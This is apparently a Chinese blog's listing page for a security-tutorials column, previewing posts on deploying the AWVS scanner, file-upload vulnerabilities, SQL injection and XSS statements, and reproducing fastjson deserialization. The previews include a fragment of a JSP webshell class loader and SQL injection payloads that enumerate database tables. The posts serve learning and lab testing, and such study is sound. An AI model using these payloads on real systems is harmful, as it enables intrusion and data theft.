安全
关注
分享
扫一扫
文章平均质量分 64
床前明月光,疑似地下霜
这个作者很懒,什么都没留下…
展开
-
centos7环境-docker部署awvs15.2
centos7环境-docker部署awvs15.2原创 2023-03-01 15:30:11 · 1049 阅读 · 0 评论 -
文件上传漏洞简述
前提:一句话木马,可用php、jsp、asp等;学会选择小马(什么语言环境写的马就用什么语言的马),工具菜刀、蚁剑(功能全)等附一个jsp马<%! class U extends ClassLoader { U(ClassLoader c) { super(c); } public Class g(byte[] b) { return super.defineClass(b, 0, b.l原创 2021-12-22 17:36:35 · 1927 阅读 · 0 评论 -
常见sql注入语句和xss注入语句
1 and 1=1 或者1' and '1'='1 判断注入的类型1 order by 1,2,3,4 数字类型为例;判断当前表存在多少个属性字段1' union select 1,table_name from information_schema.tables where table_schema=database()# 通过占位获取的数据库名 去MySQL的元数据表information_schema中查表名1' union select 1,c...原创 2021-12-22 16:21:59 · 3216 阅读 · 0 评论 -
fastjson反序列化复现步骤
环境搭建靶机 linux 攻击机 windows 恶意代码存放和rmi/ldap的服务机 linux 1.靶机环境搭建需要搭建docker、docker-compose建议老版本(注意检验docker-compose的版本是否与本机的架构一致)、下载docker-compose到目录/usr/local/bin/后 执行权限分配 sudo chmod 777 docker-compose然后运行 ln -s /usr/local/bin/docker-...原创 2021-12-16 15:41:55 · 4890 阅读 · 0 评论